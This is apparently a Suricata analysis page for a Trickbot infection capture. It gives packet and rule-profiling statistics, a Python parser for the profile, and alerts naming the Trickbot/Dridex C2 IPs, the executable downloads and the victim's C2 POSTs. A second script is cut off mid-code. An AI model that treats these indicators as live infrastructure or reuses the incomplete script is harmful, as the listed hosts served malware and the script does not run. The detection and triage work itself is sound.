Filename: 2019-01-30-Trickbot-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.0649609566 seconds
Hash (MD5): 27c27f6013451b522f979b5a048809f1
Uploaded: 1548925217 (Unix epoch, 2019-01-31 09:00:17 UTC)

Logfiles


packet_stats.log - (12917 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          7077          1253805      761055825     568647333       4024.3b   99.84
 IPv4      17            14         10814628      579873806     450896493          6.3b    0.16
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          7077            67358       13210254        147877          1.0b   93.20
TMM_FLOWWORKER              IPv4      17            14           401515        5329811        861668         12.1m    1.07
TMM_RECEIVEPCAPFILE         IPv4       6          7067             2540       18605704          6225         44.0m    3.92
TMM_RECEIVEPCAPFILE         IPv4      17            14             2549          10479          3216         45.0k    0.00
TMM_DECODEPCAPFILE          IPv4       6          7067             2656          38827          2860         20.2m    1.80
TMM_DECODEPCAPFILE          IPv4      17            14             2698          25181          4581         64.1k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg            tot           %
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
flow                    IPv4       6          7067             2809        7039445          5173         36.6m  3.89  
flow                    IPv4      17            14             2925          24381          5745         80.4k  0.01  
stream                  IPv4       6          7077             2772        1729316          6429         45.5m  4.84  
app-layer               IPv4      17            14             8748          36291         16109        225.5k  0.02  
detect                  IPv4       6          7077            44970       13177708        117296        830.1m  88.37 
detect                  IPv4      17            14           341633         704315        450870          6.3m  0.67  
tcp-prune               IPv4       6          7077             2549          36324          2910         20.6m  2.19  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg            tot           %
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
http                    IPv4       6             9             3846          32602         10143         91.3k  42.13 
tls                     IPv4       6            16             2642           4463          2925         46.8k  21.60 
dns                     IPv4      17            14             3207           9857          5612         78.6k  36.26 
Proto detect            IPv4      17            14             3455          16920          6760         94.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot           %
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
LOGGER_ALERT_FAST           IPv4       6            17            18763         107174         50703        862.0k  8.29  
LOGGER_UNIFIED2             IPv4       6            17            28743         193378         64713          1.1m  10.58 
LOGGER_JSON_ALERT           IPv4       6            17            42991         181988         84359          1.4m  13.79 
LOGGER_JSON_DNS             IPv4      17            14            29463        4531269        372577          5.2m  50.15 
LOGGER_JSON_HTTP            IPv4       6             7            40540         136333         83322        583.3k  5.61  
LOGGER_JSON_TLS             IPv4       6             8            36799         114899         68920        551.4k  5.30  
LOGGER_JSON_FILE            IPv4       6             7            66612         127886         93435        654.0k  6.29  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           744             2580         173471         23672        17.6m  13.89 
payload                           IPv4      17            14            12199          79949         35374       495.2k  0.39  
stream                            IPv4       6           744             2545       10575849         51132        38.0m  30.00 
http_uri                          IPv4       6             7             7566          45093         20724       145.1k  0.11  
http_request_line                 IPv4       6             7             5918           8569          7433        52.0k  0.04  
http_client_body                  IPv4       6            14             2632         229225         27491       384.9k  0.30  
http_header (request)             IPv4       6             7            23790         106533         62621       438.3k  0.35  
http_header (request trailer)     IPv4       6             7             2602           2831          2722        19.1k  0.02  
http_header_names (request)       IPv4       6             7            12425          25366         19172       134.2k  0.11  
http_accept (request)             IPv4       6             7             3654          11978          5005        35.0k  0.03  
http_referer (request)            IPv4       6             7             2912           4655          3590        25.1k  0.02  
http_content_len (request)        IPv4       6             7             3306           6321          4880        34.2k  0.03  
http_content_type (request)       IPv4       6             7             3814          12907          7429        52.0k  0.04  
http_protocol (request)           IPv4       6             7             3863           6596          5328        37.3k  0.03  
http_start (request)              IPv4       6             7            10919          20632         13846        96.9k  0.08  
http_raw_header (request)         IPv4       6            14             3764          14977          9039       126.6k  0.10  
http_method                       IPv4       6             7             5137           7370          6296        44.1k  0.03  
http_cookie (request)             IPv4       6             7             3292           4520          3715        26.0k  0.02  
http_raw_uri                      IPv4       6             7             5220           6815          6098        42.7k  0.03  
http_user_agent                   IPv4       6             7             2982          62768         25734       180.1k  0.14  
http_host                         IPv4       6             7             4398          11491          5798        40.6k  0.03  
dns_query                         IPv4      17             7             4670          42208         13378        93.6k  0.07  
tls_sni                           IPv4       6             9             2815           6944          3794        34.1k  0.03  
http_response_line                IPv4       6             7             8432          90314         21123       147.9k  0.12  
http_header (response)            IPv4       6             7            19166          50268         33308       233.2k  0.18  
http_header (response trailer)    IPv4       6             7             2623           3748          2959        20.7k  0.02  
http_content_type (response)      IPv4       6             7             4678           8139          5972        41.8k  0.03  
http_raw_header (response)        IPv4       6           637             3850          78694          4589         2.9m  2.31  
http_cookie (response)            IPv4       6             7             3057           3858          3364        23.6k  0.02  
http_stat_code                    IPv4       6             7             3598           4496          4060        28.4k  0.02  
tls_cert_issuer                   IPv4       6             8             4470           9193          7142        57.1k  0.05  
tls_cert_subject                  IPv4       6             8             7990          25718         12565       100.5k  0.08  
tls_cert_serial                   IPv4       6             8             3743           6578          5217        41.7k  0.03  
file_data (http response)         IPv4       6           630             2562        6277245        103149        65.0m  51.25 
Total                             IPv4                  2991                                         42392       126.8m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot           %
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
PROF_DETECT_IPONLY          IPv4       6            33             8388          95728         44048          1.5m  0.18  
PROF_DETECT_IPONLY          IPv4      17            14            36606         108143         45531        637.4k  0.08  
PROF_DETECT_RULES           IPv4       6          7077             2532       10746865         23191        164.1m  19.78 
PROF_DETECT_RULES           IPv4      17            14           158358         413408        268650          3.8m  0.45  
PROF_DETECT_STATEFUL_START    IPv4       6           401             5124        9759641        109828         44.0m  5.31  
PROF_DETECT_STATEFUL_CONT    IPv4       6          7077             2536        7006614          9547         67.6m  8.14  
PROF_DETECT_STATEFUL_CONT    IPv4      17            14             5476          87607         11765        164.7k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          7012             2552          51271          2784         19.5m  2.35  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            14             2650          19815          4055         56.8k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          7077             7901       10664619         35176        248.9m  30.01 
PROF_DETECT_PREFILTER       IPv4      17            14            41559         125838         72723          1.0m  0.12  
PROF_DETECT_PF_PAYLOAD      IPv4       6           744            14383       10620550         82988         61.7m  7.44  
PROF_DETECT_PF_PAYLOAD      IPv4      17            14            17270          85054         40579        568.1k  0.07  
PROF_DETECT_PF_TX           IPv4       6          7012             2557        6290906         14469        101.5m  12.23 
PROF_DETECT_PF_TX           IPv4      17             7             9991          47919         18949        132.6k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6           480             2531          46230          3683          1.8m  0.21  
PROF_DETECT_PF_SORT1        IPv4      17            14             3663           5485          4486         62.8k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          7077             2521          53560          2772         19.6m  2.37  
PROF_DETECT_PF_SORT2        IPv4      17            14             2831          23145          4738         66.3k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          7077             2534        5832885          3795         26.9m  3.24  
PROF_DETECT_NONMPMLIST      IPv4      17            14             2591           3866          3029         42.4k  0.01  
PROF_DETECT_ALERT           IPv4       6          7077             2525          45591          2771         19.6m  2.36  
PROF_DETECT_ALERT           IPv4      17            14             2538          11819          3442         48.2k  0.01  
PROF_DETECT_CLEANUP         IPv4       6          7077             2563        4369827          3479         24.6m  2.97  
PROF_DETECT_CLEANUP         IPv4      17            14             2858           5154          3365         47.1k  0.01  
PROF_DETECT_GETSGH          IPv4       6          7077             2525          89614          3042         21.5m  2.60  
PROF_DETECT_GETSGH          IPv4      17            14             5373           6941          5823         81.5k  0.01  


suricata-4.0.0-etpro-all-perf.txt-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (71126 bytes)
  --------------------------------------------------------------------------
  Date: 1/31/2019 -- 09:00:39. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2020865      1        3        12332152     9.11   31       0        8633255     397811.35   0.00        397811.35  
  2        2018457      1        1        6648570      4.91   3        0        6639972     2216190.00  0.00        2216190.00 
  3        2008297      1        5        6249532      4.62   53       0        6088841     117915.70   0.00        117915.70  
  4        2014519      1        7        10786109     7.97   63       0        6021903     171208.08   0.00        171208.08  
  5        2804906      1        3        652187       0.48   4        0        530136      163046.75   0.00        163046.75  
  6        2803657      1        5        882864       0.65   9        0        493580      98096.00    0.00        98096.00   
  7        2802987      1        5        2254851      1.67   40       0        491679      56371.28    0.00        56371.28   
  8        2803027      1        6        1349285      1.00   13       0        489307      103791.15   0.00        103791.15  
  9        2804927      1        2        1034151      0.76   9        0        485411      114905.67   0.00        114905.67  
  10       2804907      1        3        1013645      0.75   6        0        482682      168940.83   0.00        168940.83  
  11       2802991      1        5        737214       0.54   7        0        480204      105316.29   0.00        105316.29  
  12       2820157      1        2        3660114      2.70   25       0        281837      146404.56   0.00        146404.56  
  13       2819930      1        2        4008294      2.96   27       0        268147      148455.33   0.00        148455.33  
  14       2819664      1        2        4027158      2.98   27       0        266790      149154.00   0.00        149154.00  
  15       2820158      1        2        3655128      2.70   25       0        258929      146205.12   0.00        146205.12  
  16       2827896      1        3        928224       0.69   6        0        257393      154704.00   0.00        154704.00  
  17       2016854      1        3        573210       0.42   3        0        237256      191070.00   0.00        191070.00  
  18       2016855      1        2        647281       0.48   3        0        236651      215760.33   0.00        215760.33  
  19       2018342      1        2        1204030      0.89   10       0        204458      120403.00   0.00        120403.00  
  20       2023476      1        5        739797       0.55   7        0        186692      105685.29   0.00        105685.29  
  21       2815154      1        2        509860       0.38   4        0        185800      127465.00   0.00        127465.00  
  22       2021749      1        6        260128       0.19   4        0        176615      65032.00    0.00        65032.00   
  23       2022797      1        2        1214304      0.90   11       0        167517      110391.27   0.00        110391.27  
  24       2830764      1        2        4321368      3.19   470      0        165283      9194.40     0.00        9194.40    
  25       2008575      1        5        4523966      3.34   558      0        141422      8107.47     0.00        8107.47    
  26       2809855      1        2        484591       0.36   5        0        129904      96918.20    0.00        96918.20   
  27       2809923      1        2        537845       0.40   5        0        124495      107569.00   0.00        107569.00  
  28       2019715      1        2        747207       0.55   11       0        123433      67927.91    0.00        67927.91   
  29       2814978      1        2        194083       0.14   4        0        116545      48520.75    0.00        48520.75   
  30       2017552      1        6        3583886      2.65   248      0        114278      14451.15    0.00        14451.15   
  31       2814979      1        2        194101       0.14   4        0        113853      48525.25    0.00        48525.25   
  32       2021375      1        2        460133       0.34   5        0        113662      92026.60    0.00        92026.60   
  33       2809981      1        3        465738       0.34   5        0        110872      93147.60    0.00        93147.60   
  34       2808503      1        2        469870       0.35   5        0        110353      93974.00    0.00        93974.00   
  35       2018358      1        7        328549       0.24   6        3        100948      54758.17    19656.33    89860.00   
  36       2021013      1        6        172662       0.13   2        2        99698       86331.00    86331.00    0.00       
  37       2019832      1        4        402689       0.30   5        0        96614       80537.80    0.00        80537.80   
  38       2811281      1        8        149502       0.11   3        0        82186       49834.00    0.00        49834.00   
  39       2018005      1        6        511026       0.38   9        0        79183       56780.67    0.00        56780.67   
  40       2820117      1        2        487526       0.36   11       0        77898       44320.55    0.00        44320.55   
  41       2822213      1        2        173661       0.13   9        0        77572       19295.67    0.00        19295.67   
  42       2809267      1        8        77442        0.06   1        0        77442       77442.00    0.00        77442.00   
  43       2022262      1        3        130983       0.10   3        0        76297       43661.00    0.00        43661.00   
  44       2018959      1        3        181207       0.13   3        3        74304       60402.33    60402.33    0.00       
  45       2804911      1        3        614364       0.45   12       0        72780       51197.00    0.00        51197.00   
  46       2022198      1        2        215982       0.16   4        0        71600       53995.50    0.00        53995.50   
  47       2020388      1        8        155804       0.12   3        0        71342       51934.67    0.00        51934.67   
  48       2810654      1        4        227820       0.17   4        4        70239       56955.00    56955.00    0.00       
  49       2016537      1        2        3854264      2.85   243      2        68855       15861.17    66135.50    15443.95   
  50       2830124      1        1        68456        0.05   1        0        68456       68456.00    0.00        68456.00   
  51       2024829      1        2        836831       0.62   38       0        67465       22021.87    0.00        22021.87   
  52       2821615      1        2        146324       0.11   3        0        67245       48774.67    0.00        48774.67   
  53       2816909      1        2        179509       0.13   3        0        67210       59836.33    0.00        59836.33   
  54       2013352      1        4        160808       0.12   3        0        64871       53602.67    0.00        53602.67   
  55       2018241      1        2        167527       0.12   3        0        64722       55842.33    0.00        55842.33   
  56       2821561      1        2        101241       0.07   2        0        64661       50620.50    0.00        50620.50   
  57       2025119      1        3        64154        0.05   1        0        64154       64154.00    0.00        64154.00   
  58       2025441      1        2        64100        0.05   1        0        64100       64100.00    0.00        64100.00   
  59       2828876      1        1        237754       0.18   61       0        63635       3897.61     0.00        3897.61    
  60       2022535      1        11       349847       0.26   7        0        62501       49978.14    0.00        49978.14   
  61       2816940      1        2        182848       0.14   3        0        62407       60949.33    0.00        60949.33   
  62       2021946      1        2        276895       0.20   5        0        61670       55379.00    0.00        55379.00   
  63       2823966      1        1        106245       0.08   16       0        59117       6640.31     0.00        6640.31    
  64       2022627      1        12       342456       0.25   7        0        59018       48922.29    0.00        48922.29   
  65       2830033      1        1        58451        0.04   1        0        58451       58451.00    0.00        58451.00   
  66       2815132      1        3        58084        0.04   1        0        58084       58084.00    0.00        58084.00   
  67       2816910      1        2        168466       0.12   3        0        57973       56155.33    0.00        56155.33   
  68       2009897      1        14       148550       0.11   3        0        57176       49516.67    0.00        49516.67   
  69       2022339      1        2        150818       0.11   3        0        55835       50272.67    0.00        50272.67   
  70       2816619      1        2        159787       0.12   4        0        55764       39946.75    0.00        39946.75   
  71       2017613      1        9        144728       0.11   3        0        55641       48242.67    0.00        48242.67   
  72       2815324      1        2        113176       0.08   3        0        55491       37725.33    0.00        37725.33   
  73       2008438      1        20       143643       0.11   3        0        55411       47881.00    0.00        47881.00   
  74       2816356      1        2        135152       0.10   3        0        55380       45050.67    0.00        45050.67   
  75       2023711      1        2        121403       0.09   3        0        55084       40467.67    0.00        40467.67   
  76       2008276      1        15       54939        0.04   1        1        54939       54939.00    54939.00    0.00       
  77       2816394      1        2        53938        0.04   1        0        53938       53938.00    0.00        53938.00   
  78       2014701      1        12       192371       0.14   14       0        53831       13740.79    0.00        13740.79   
  79       2022220      1        2        135240       0.10   3        0        53603       45080.00    0.00        45080.00   
  80       2815254      1        7        153860       0.11   3        0        53352       51286.67    0.00        51286.67   
  81       2025178      1        2        53057        0.04   1        0        53057       53057.00    0.00        53057.00   
  82       2816928      1        3        143648       0.11   3        0        52450       47882.67    0.00        47882.67   
  83       2816327      1        4        135902       0.10   3        0        52280       45300.67    0.00        45300.67   
  84       2828122      1        2        124471       0.09   3        0        52218       41490.33    0.00        41490.33   
  85       2816927      1        3        130110       0.10   3        0        51818       43370.00    0.00        43370.00   
  86       2022053      1        2        80306        0.06   3        0        51798       26768.67    0.00        26768.67   
  87       2801929      1        7        597112       0.44   14       0        51521       42650.86    0.00        42650.86   
  88       2815214      1        2        51346        0.04   1        0        51346       51346.00    0.00        51346.00   
  89       2801930      1        7        540433       0.40   14       0        51229       38602.36    0.00        38602.36   
  90       2014819      1        3        148191       0.11   3        0        51193       49397.00    0.00        49397.00   
  91       2022502      1        4        133283       0.10   3        0        50901       44427.67    0.00        44427.67   
  92       2019141      1        3        121935       0.09   3        0        50558       40645.00    0.00        40645.00   
  93       2024650      1        1        930655       0.69   63       0        50271       14772.30    0.00        14772.30   
  94       2022080      1        1        145097       0.11   4        4        49957       36274.25    36274.25    0.00       
  95       2816925      1        3        114794       0.08   3        0        48492       38264.67    0.00        38264.67   
  96       2826256      1        2        198718       0.15   7        0        48027       28388.29    0.00        28388.29   
  97       2820855      1        3        176301       0.13   10       0        47940       17630.10    0.00        17630.10   
  98       2812976      1        3        154806       0.11   4        0        47733       38701.50    0.00        38701.50   
  99       2014353      1        6        138788       0.10   3        0        47033       46262.67    0.00        46262.67   
  100      2021067      1        2        85086        0.06   2        2        46989       42543.00    42543.00    0.00       
  101      2022050      1        3        115193       0.09   3        0        46974       38397.67    0.00        38397.67   
  102      2024565      1        3        133004       0.10   4        0        46940       33251.00    0.00        33251.00   
  103      2812916      1        6        103693       0.08   3        0        46727       34564.33    0.00        34564.33   
  104      2020569      1        1        113773       0.08   3        0        46325       37924.33    0.00        37924.33   
  105      2022547      1        1        480212       0.35   141      0        45964       3405.76     0.00        3405.76    
  106      2823263      1        3        131812       0.10   4        0        45877       32953.00    0.00        32953.00   
  107      2009028      1        11       130404       0.10   3        0        45780       43468.00    0.00        43468.00   
  108      2018983      1        7        98736        0.07   3        0        45555       32912.00    0.00        32912.00   
  109      2805985      1        2        121645       0.09   3        0        45198       40548.33    0.00        40548.33   
  110      2014958      1        1        451848       0.33   33       0        45089       13692.36    0.00        13692.36   
  111      2018316      1        4        141567       0.10   4        0        44929       35391.75    0.00        35391.75   
  112      2018452      1        15       116594       0.09   3        0        44618       38864.67    0.00        38864.67   
  113      2816930      1        4        122433       0.09   3        0        44557       40811.00    0.00        40811.00   
  114      2830243      1        2        64052        0.05   5        1        44198       12810.40    10707.00    13336.25   
  115      2018496      1        9        103138       0.08   3        0        43388       34379.33    0.00        34379.33   
  116      2809256      1        3        89842        0.07   16       0        43200       5615.12     0.00        5615.12    
  117      2009909      1        10       126455       0.09   3        0        43145       42151.67    0.00        42151.67   
  118      2018958      1        18       127209       0.09   3        0        42600       42403.00    0.00        42403.00   
  119      2013441      1        9        124391       0.09   3        0        42407       41463.67    0.00        41463.67   
  120      2012969      1        2        41420        0.03   1        0        41420       41420.00    0.00        41420.00   
  121      2811282      1        7        41407        0.03   1        0        41407       41407.00    0.00        41407.00   
  122      2022197      1        3        71311        0.05   2        0        41343       35655.50    0.00        35655.50   
  123      2816328      1        5        95742        0.07   3        0        41143       31914.00    0.00        31914.00   
  124      2816525      1        10       118282       0.09   3        0        40912       39427.33    0.00        39427.33   
  125      2023315      1        2        1

This file has been truncated.
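Reading the rule profile above by hand is tedious. The Python below is added here as a worked example; it is not Suricata's code and not part of this page's output. It parses the 12-column rule profiling layout shown above and ranks the rules that burned the most ticks without ever matching, which is the usual starting point when tuning a ruleset against a given traffic profile. SAMPLE_RULE_PERF is a constructed excerpt that copies a handful of rows from the table, plus the truncated final row exactly as the page shows it, so the parser demonstrates skipping a partial record rather than crashing on it. The function names and the "never matched" ranking are this example's own choices, not a Suricata feature.

```python
"""Rank rules in a Suricata rule-profiling dump (rule_perf.log layout) by cost.

Added example, not Suricata code. SAMPLE_RULE_PERF is a constructed excerpt of
the profile shown on this page, including its truncated trailing row.
"""

# Column order of the "Sorted by: max ticks" table as Suricata prints it.
COLUMNS = ("num", "sid", "gid", "rev", "ticks", "pct", "checks", "matches",
           "max_ticks", "avg_ticks", "avg_match", "avg_nomatch")

SAMPLE_RULE_PERF = """\
  --------------------------------------------------------------------------
  Date: 1/31/2019 -- 09:00:39. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- --------------
  1        2020865      1        3        12332152     9.11   31       0        8633255     397811.35   0.00        397811.35
  2        2018457      1        1        6648570      4.91   3        0        6639972     2216190.00  0.00        2216190.00
  4        2014519      1        7        10786109     7.97   63       0        6021903     171208.08   0.00        171208.08
  24       2830764      1        2        4321368      3.19   470      0        165283      9194.40     0.00        9194.40
  25       2008575      1        5        4523966      3.34   558      0        141422      8107.47     0.00        8107.47
  35       2018358      1        7        328549       0.24   6        3        100948      54758.17    19656.33    89860.00
  44       2018959      1        3        181207       0.13   3        3        74304       60402.33    60402.33    0.00
  49       2016537      1        2        3854264      2.85   243      2        68855       15861.17    66135.50    15443.95
  125      2023315      1        2        1
"""


def parse_rule_perf(text):
    """Return one dict per complete data row. Headers, separators and the
    truncated last row (fewer than 12 fields) are skipped, not fatal."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(COLUMNS) or not parts[0].isdigit():
            continue
        row = dict(zip(COLUMNS, parts))
        for key in ("num", "sid", "gid", "rev", "ticks", "checks", "matches", "max_ticks"):
            row[key] = int(row[key])
        for key in ("pct", "avg_ticks", "avg_match", "avg_nomatch"):
            row[key] = float(row[key])
        rows.append(row)
    return rows


def never_matched(rows, top=5):
    """Rules that consumed the most ticks in this run without a single match:
    the first candidates to review (fast_pattern choice, content anchoring, or disabling)."""
    return sorted((r for r in rows if r["matches"] == 0),
                  key=lambda r: r["ticks"], reverse=True)[:top]


def costliest_per_check(rows, top=5):
    """Rules with the highest average ticks per check, regardless of match outcome."""
    return sorted(rows, key=lambda r: r["avg_ticks"], reverse=True)[:top]


def matched(rows):
    """Rules that fired at least once; cross-check these against the alert log."""
    return [r for r in rows if r["matches"] > 0]


def ticks_share(rows, sids):
    """Fraction of the total ticks in `rows` spent on the given SIDs."""
    total = sum(r["ticks"] for r in rows)
    return sum(r["ticks"] for r in rows if r["sid"] in sids) / total if total else 0.0


if __name__ == "__main__":
    rows = parse_rule_perf(SAMPLE_RULE_PERF)
    print("rows parsed:", len(rows))
    for r in never_matched(rows):
        print(f"sid {r['sid']} rev {r['rev']}: {r['ticks']} ticks over {r['checks']} checks, 0 matches")
    print("matched:", [r["sid"] for r in matched(rows)])
```

On the excerpt, 2020865 and 2014519 alone account for roughly half of the sampled ticks while matching nothing; on the full 71 KB profile the same ranking tells you which signatures are expensive for this traffic mix and which are merely noisy.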


suricata-4.0.0-etpro-all-alert-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (5189 bytes)
01/30/2019-21:03:51.319533  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 37.59.247.21:80 -> 10.1.30.101:49194
01/30/2019-21:03:51.319533  [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 37.59.247.21:80 -> 10.1.30.101:49194
01/30/2019-21:04:05.406223  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49197
01/30/2019-21:04:10.762144  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:10.771347  [**] [1:2021013:6] ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:10.771347  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:59.542845  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49201
01/30/2019-21:05:01.999394  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49202
01/30/2019-21:05:22.548371  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49203 -> 24.247.181.125:8082
01/30/2019-21:06:07.110045  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49204 -> 24.247.181.125:8082
01/30/2019-21:06:10.021646  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49205 -> 24.247.181.125:8082
01/30/2019-21:06:30.723373  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:06:30.730375  [**] [1:2021013:6] ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:06:30.730375  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:07:04.819752  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:04.819752  [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:04.819752  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:46.268769  [**] [1:2830243:2] ETPRO TROJAN W32/Trickbot C2 (networkDll module) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49259 -> 24.247.181.125:8082
01/30/2019-21:07:46.268769  [**] [1:2100494:12] GPL ATTACK_RESPONSE command completed [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49259 -> 24.247.181.125:8082
01/30/2019-21:08:01.444668  [**] [1:2008276:15] ET USER_AGENTS Suspicious User-Agent (contains loader) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49260 -> 107.173.104.203:80
01/30/2019-21:08:01.602850  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 107.173.104.203:80 -> 10.1.30.101:49260
01/30/2019-21:08:01.602850  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49260
01/30/2019-21:13:12.661871  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49536
01/30/2019-21:16:37.641673  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49537
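The alert log above is the whole story of this infection in 24 lines, but fast.log is awkward to triage by eye. As an added example (not part of this page's logs or of Suricata's own tooling), the script below parses fast.log records, groups them by the external peer of the victim 10.1.30.101, and lists the endpoints in the order the victim first touched them. The sample input is seven lines copied from the alert file above; the only assumption is Suricata's fast output line format.

```python
"""Parse Suricata fast.log alert lines and reduce them to a per-peer view of the
infection chain.  Added example for this page, not part of the original logs."""
import re
from datetime import datetime

VICTIM = "10.1.30.101"  # the infected host, as seen in the alert log on this page

# Seven lines copied verbatim from the fast.log alert file above.
SAMPLE_FAST_LOG = """\
01/30/2019-21:03:51.319533  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 37.59.247.21:80 -> 10.1.30.101:49194
01/30/2019-21:04:05.406223  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49197
01/30/2019-21:04:10.771347  [**] [1:2021013:6] ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:05:22.548371  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49203 -> 24.247.181.125:8082
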